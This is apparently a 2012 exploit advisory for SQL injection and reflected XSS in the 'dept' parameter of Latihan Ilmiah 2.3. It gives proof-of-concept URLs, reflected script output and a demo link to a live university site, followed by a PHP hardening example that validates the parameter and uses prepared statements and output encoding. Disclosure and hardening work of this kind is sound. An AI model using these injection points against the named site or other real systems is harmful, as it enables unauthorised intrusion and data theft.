Latihan Ilmiah 2.3 Cross Site Scripting / SQL Injection
Posted on 09 October 2012
##################################################
# Exploit Title: Latihan Ilmiah v2.3 Release <= SQLi /XSS Vulnerability
# Date: 07/10/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# 3Mail: ryuzaki_l@y7mail.com
# Category: webapps
# Google dork: -
# Tested on: Linux
+---------------------------------------------------+

[~]Exploit/p0c :

http://localhost/index.php?file=notice&dept=[SQLi]
http://localhost/index.php?file=notice&dept=[XSS]

<table width="100%" border="0" cellspacing="1" cellpadding="1">
  <tr>
    <td bgcolor="#3399FF" class="font_title2"><div align="center">Announcement: <script>alert(100)</script> </div></td>
  </tr>
  <tr class="font_content_s">
    <td><table width="100%" border="1" cellspacing="1" cellpadding="1" class="border1">
      <tr bgcolor="#FBE3B7" class="font_title border1" >
        <td width="17%"><div align="center">Date</div></td>
        <td width="83%"><div align="center">Subject</div></td>
      </tr>
    </table></td>

[~] Demo

http://ilmiah.fsktm.um.edu.my/index.php?file=notice&dept=[xss]

+---------------------------------------------------+
Greetz to : ./CyberSEC & Sofea Hana
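
The PoC above shows one parameter, dept, reaching both a SQL query and the "Announcement:" cell unmodified. The following is an added example of how that handler could be hardened; it is not code from Latihan Ilmiah or from the advisory's author. The table and column names (notices, dept, posted, subject), the department-code format and the helper names are assumptions, since the application's source is not on the page.

```php
<?php
declare(strict_types=1);

// Constructed in-memory data so the example runs offline (needs pdo_sqlite).
// Schema is hypothetical; the real application's tables are not on the page.
function demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE notices (dept TEXT, posted TEXT, subject TEXT)');
    $db->exec("INSERT INTO notices VALUES ('CS', '2012-10-01', 'Viva <schedule>')");
    return $db;
}

// Encode a value for an HTML text or quoted-attribute context.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// $dept is the raw request value, e.g. $_GET['dept'] ?? null.
function render_notices(PDO $db, $dept): string {
    // 1. Validate: reject arrays (?dept[]=x) and anything outside the
    //    assumed department-code format. The caller should answer HTTP 400.
    if (!is_string($dept) || !preg_match('/\A[A-Za-z0-9_-]{1,16}\z/', $dept)) {
        return "<p>Invalid department.</p>\n";
    }

    // 2. SQL injection: bind the value as a parameter, never concatenate it.
    $stmt = $db->prepare(
        'SELECT posted, subject FROM notices WHERE dept = ? ORDER BY posted DESC'
    );
    $stmt->execute([$dept]);

    // 3. XSS: encode on output, for the reflected parameter and for stored
    //    fields alike, so the page stays safe even if validation is relaxed.
    $html = '<div align="center">Announcement: ' . h($dept) . "</div>\n<table>\n";
    foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row) {
        $html .= '<tr><td>' . h($row['posted']) . '</td><td>'
               . h($row['subject']) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

$db = demo_db();
echo render_notices($db, 'CS');                          // normal request
echo render_notices($db, '<script>alert(100)</script>'); // rejected by validation
echo render_notices($db, ['x']);                         // array input rejected
```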
